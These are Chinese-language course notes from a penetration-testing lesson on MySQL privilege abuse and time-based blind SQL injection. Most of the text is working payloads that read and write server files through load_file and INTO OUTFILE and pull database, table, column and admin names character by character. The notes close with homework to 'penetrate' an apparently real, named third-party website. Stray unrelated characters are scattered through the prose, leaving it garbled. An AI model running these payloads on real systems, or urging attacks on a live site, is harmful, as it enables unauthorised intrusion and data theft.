第四天:mysql權(quán)限滲透-mysql盲注攻擊(上)
1.分析上節(jié)課的作業(yè):獲取所有數(shù)據(jù)庫名的注入語句怎么寫?
- 抓包工具分析注入工具語句
先網(wǎng)上下載工具注入工具h(yuǎn)avij 1.17 pro版本和抓包工具WSExplorer - 通過數(shù)據(jù)庫屬性分析注入語句
information_schema.schemata 存儲(chǔ)mysql下所有數(shù)據(jù)庫名信息的表名
schema_name 數(shù)據(jù)庫名
http://127.0.0.1/sqlin/mysql/index.php?x=1 union select schema_name,2,3 from information_schema.schemata
2.實(shí)驗(yàn):測(cè)試不同數(shù)據(jù)庫用戶的操作權(quán)限
文件讀寫測(cè)試:讀就是load_file()秘通,寫就是into outfile()
-
Mysql最高權(quán)限用戶root:可讀可寫
root讀寫權(quán)限.jpg
注意:如發(fā)現(xiàn)讀取時(shí)為NULL甸鸟,直接執(zhí)行show global variables like '%secure%'; 發(fā)現(xiàn)secure_file_priv的值為NULL是越,然后修改mysql.ini 文件馆里,在[mysqld] 下加入secure_file_priv =
保存堂鲜,重啟mysql伞芹。這樣就能讀到內(nèi)容了忘苛。 Mysql普通權(quán)限用戶:無權(quán)限文件讀寫。
3.注入點(diǎn)數(shù)據(jù)庫用戶權(quán)限由什么決定唱较?
連接數(shù)據(jù)庫用戶決定
4.Mysql注入點(diǎn)進(jìn)行文件讀寫操作
條件:root權(quán)限注入點(diǎn)
讀取語句:讀取C盤下123.txt文件內(nèi)容
http://127.0.0.1/sqlin/mysql/index.php?x=1%20union%20select%20load_file(%27c:/123.txt%27),2,3
寫入語句:
http://127.0.0.1/sqlin/mysql/index.php?x=1%20union%20select%20%27abcd%27,2,3%20into%20outfile%20%27c:/www2.txt%27
注意事項(xiàng):
-
符號(hào)問題
使用“/”或“\”扎唾;不使用“\”
原因:編程中“\”多半是轉(zhuǎn)義,如\n是換行
符號(hào)問題.jpg - 編碼問題
如果要寫入數(shù)據(jù)中帶有單引號(hào)南缓,怎么辦胸遇?
編碼解決!(用編碼就不用單引號(hào))
比如:
http://127.0.0.1/sqlin/mysql/index.php?x=1 union select 0x6161616127,2,3 into outfile 'c:/1234.txt'
這里的十六進(jìn)制表示的就是aaaa'
5.網(wǎng)站路徑獲取方法
-
遺留文件
一般在網(wǎng)站根目錄下汉形,命名有php.php纸镊、info.php、
phpinfo.php概疆、test.php逗威、php_info.php等。
phpinfo.png -
報(bào)錯(cuò)顯示
報(bào)錯(cuò)顯示.png -
漏洞暴路徑
漏洞暴路徑.png -
讀取搭建平臺(tái)配置文件
vhosts.png
-
社工(字典猜解岔冀,谷歌黑客等)
盲猜D:/www/
D:/wwwroot/
D:/web/
等
谷歌黑客.png
6.Mysql盲注
-
sleep盲注攻擊
比如select * from news where id=1 union select database(),2,sleep(5)
sleep盲注.png
能正常執(zhí)行凯旭,并在5秒后出結(jié)果,證明可以正常執(zhí)行使套。用sleep可以判斷你寫的語句對(duì)不對(duì)罐呼。
If(條件,true,false):
條件成立,返回第二個(gè)參數(shù)侦高,反之返回第三個(gè)參數(shù)
比如select * from news where id=1 union select 1,2,sleep(if(length(database())=5,5,0))
判斷數(shù)據(jù)庫長(zhǎng)度是否等于5嫉柴,如果等于5就延遲5秒,不等于就不延遲奉呛。
又比如select * from news where id=1 union select database(),2,sleep(if(mid(database(),1,1)='s',5,0))
查詢數(shù)據(jù)庫名稱第一個(gè)字母是不是等于's'的差凹,是就延遲5秒。
(mid函數(shù)有三個(gè)參數(shù)侧馅,第一個(gè)是字符串危尿,第二個(gè)是從哪里開始截取,第三個(gè)是截取的長(zhǎng)度)
7.Mysql盲注擴(kuò)展資料
盲注的核心是靠 if 判斷來注入
手工盲注之前先復(fù)習(xí)一下if 判斷等函數(shù)
version() 是查看數(shù)據(jù)庫版本
database() 查看數(shù)據(jù)庫名
user() 查看當(dāng)前用戶
length( xxxxx ) 函數(shù)是統(tǒng)計(jì)字符串的長(zhǎng)度
mid(str,1,3) 字符串截取
從字節(jié)1開始截 截到3就結(jié)束
ORD() 轉(zhuǎn)換成ascii碼
IF 語法:
if (條件,True,False);
開始手工盲注
select * from admin where user = "admin" and sleep(2); 執(zhí)行需要2秒
1.獲取數(shù)據(jù)庫名長(zhǎng)度
database() 查看數(shù)據(jù)庫名
( select length(database() ) )
查詢數(shù)據(jù)庫名長(zhǎng)度
select * from admin where user = "admin" and sleep( if( ( select length(database()) = 2 ) , 5,0 ) );
如果數(shù)據(jù)庫的長(zhǎng)度等于2的話那么就執(zhí)行true 否則就執(zhí)行False
最后變成了 sleep(0)
如果數(shù)據(jù)庫長(zhǎng)度等于 7 的話 就執(zhí)行true
最后變成了 sleep(5)
也就是select * from admin where user = "admin” and sleep(5)
最后得知數(shù)據(jù)庫長(zhǎng)度是 7 那么接下來就是獲取數(shù)據(jù)庫名了馁痴。
2.獲取數(shù)據(jù)庫名
數(shù)據(jù)庫長(zhǎng)度是 7
select * from admin where user = "admin" and sleep( if( (select mid(database(),1,1) = 'a' ) , 5,0 ) );
執(zhí)行執(zhí)行False 說明 第一個(gè)字節(jié)不是a
select * from admin where user = "admin" and sleep( if( (select mid(database(),1,1) = 'x' ) , 5,0 ) );
執(zhí)行執(zhí)行true 執(zhí)行了5秒 說明第一個(gè)字節(jié)是x
然后慢慢注入到7谊娇。。。济欢。赠堵。。
select * from admin where user = "admin" and sleep( if( (select mid(database(),1,1) = 'x') , 5,0 ) );
select * from admin where user = "admin" and sleep( if( (select mid(database(),2,1) = 'i' ) , 5,0 ) );
select * from admin where user = "admin" and sleep( if( (select mid(database(),3,1) = 'n') , 5,0 ) );
select * from admin where user = "admin" and sleep( if( (select mid(database(),4,1) = 'd') , 5,0 ) );
select * from admin where user = "admin" and sleep( if( (select mid(database(),5,1) = 'o') , 5,0 ) );
select * from admin where user = "admin" and sleep( if( (select mid(database(),6,1) = 'n') , 5,0 ) );
select * from admin where user = "admin" and sleep( if( (select mid(database(),7,1) = 'g') , 5,0 ) );
第一個(gè)字節(jié)是x
第二個(gè)字節(jié)是i
第三個(gè)字節(jié)是n
第四個(gè)字節(jié)是d
第五個(gè)字節(jié)是o
第六個(gè)字節(jié)是n
第七個(gè)字節(jié)是g
全都是執(zhí)行 5秒 然后得知 數(shù)據(jù)庫是 xindong
當(dāng)然了 這方法注入比較慢 比如有些數(shù)據(jù)庫是特殊符號(hào)呢法褥?那怎么辦茫叭?一個(gè)一個(gè)符號(hào)猜解嗎?
采用ORD函數(shù)進(jìn)行ascii碼來判斷會(huì)快點(diǎn)
比如:
select * from admin where user = "admin" and sleep( if( ORD((select mid(database(),1,1))) > 200 , 5,0 ) );
條件:大于200 執(zhí)行false 說明 不大于
select * from admin where user = "admin" and sleep( if( ORD((select mid(database(),1,1))) > 100 , 5,0 ) );
條件:大于100 執(zhí)行true 說明大于
select * from admin where user = "admin" and sleep( if( ORD((select mid(database(),1,1))) > 120 , 5,0 ) );
條件:大于120 執(zhí)行false 說明不大于
select * from admin where user = "admin" and sleep( if( ORD((select mid(database(),1,1))) > 110 , 5,0 ) );
條件:大于110 執(zhí)行true 說明大于
說明數(shù)據(jù)庫第一個(gè)字節(jié)的ascii碼大于110小于120
說明是110~120之間
select * from admin where user = "admin" and sleep( if( ORD((select mid(database(),1,1))) = 120 , 5,0 ) );
等于 120 執(zhí)行true 說明第一個(gè)字節(jié)的ascii碼是120
最后解碼得出是 x
3.獲取表名長(zhǎng)度
select * from admin where user = 'admin' and 1=2 union select 1, sleep(if( length(TABLE_NAME) = 5 ,5,0)) from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1
長(zhǎng)度等于 5 執(zhí)行true半等,等待5秒
說明表名長(zhǎng)度為5
4.獲取表名
獲取第1個(gè)字節(jié)
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( (select mid(TABLE_NAME,1,1))='a' ,5,0) ) from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1;
請(qǐng)求時(shí)間為5秒 說明是a
獲取第2個(gè)字節(jié)
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( (select mid(TABLE_NAME,2,1))='d' ,5,0) ) from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1;
請(qǐng)求時(shí)間為5秒 說明是d
獲取第3個(gè)字節(jié)
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( (select mid(TABLE_NAME,3,1))='m' ,5,0) ) from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1;
請(qǐng)求時(shí)間為5秒 說明是m
獲取第4個(gè)字節(jié)
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( (select mid(TABLE_NAME,4,1))='i' ,5,0) ) from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1;
請(qǐng)求時(shí)間為5秒 說明是i
獲取第5個(gè)字節(jié)
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( (select mid(TABLE_NAME,5,1))='n' ,5,0) ) from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1;
請(qǐng)求時(shí)間為5秒 說明是n
5.獲取表名的第一個(gè)字段長(zhǎng)度
表名是:admin 16進(jìn)制:61646d696e
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (length(COLUMN_NAME) = 4,5,0 ) ) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e limit 0,1;
請(qǐng)求時(shí)間5秒 說明第一個(gè)子段有4個(gè)字節(jié)
6.獲取表名的第一個(gè)字段名
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( ( select mid(COLUMN_NAME,1,1) )= 'u',5,0)) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e limit 0,1;
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( ( select mid(COLUMN_NAME,2,1) )= 's',5,0)) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e limit 0,1;
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( ( select mid(COLUMN_NAME,3,1) )= 'e',5,0)) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e limit 0,1;
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( ( select mid(COLUMN_NAME,4,1) )= 'r',5,0)) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e limit 0,1;
爆出第一個(gè)字段是 user
然后第一個(gè)字段判斷可能是用戶名 還少來個(gè)密碼字段那么就在 5.獲取表名的第一個(gè)字段長(zhǎng)度 把limit 1,1 獲取下一個(gè)字段長(zhǎng)度再進(jìn)行獲取密碼字段
7.獲取數(shù)據(jù)庫內(nèi)容
7.1 先猜第一個(gè)字段的數(shù)據(jù)庫的長(zhǎng)度
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (length(user) = 5 , 5,0) ) from admin limit 0,1;
執(zhí)行5秒 說明這個(gè)字段的數(shù)據(jù)內(nèi)容字節(jié)長(zhǎng)度是5
那么就是獲取數(shù)據(jù)了
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (mid(user,1,1) = 'a' , 5,0) ) from admin limit 0,1;
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (mid(user,2,1) = 'd' , 5,0) ) from admin limit 0,1;
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (mid(user,3,1) = 'm' , 5,0) ) from admin limit 0,1;
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (mid(user,4,1) = 'i' , 5,0) ) from admin limit 0,1;
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (mid(user,5,1) = 'n' , 5,0) ) from admin limit 0,1;
然后用戶名就是 admin 了
作業(yè):http://www.gaoneng.com/
去滲透這個(gè)網(wǎng)站
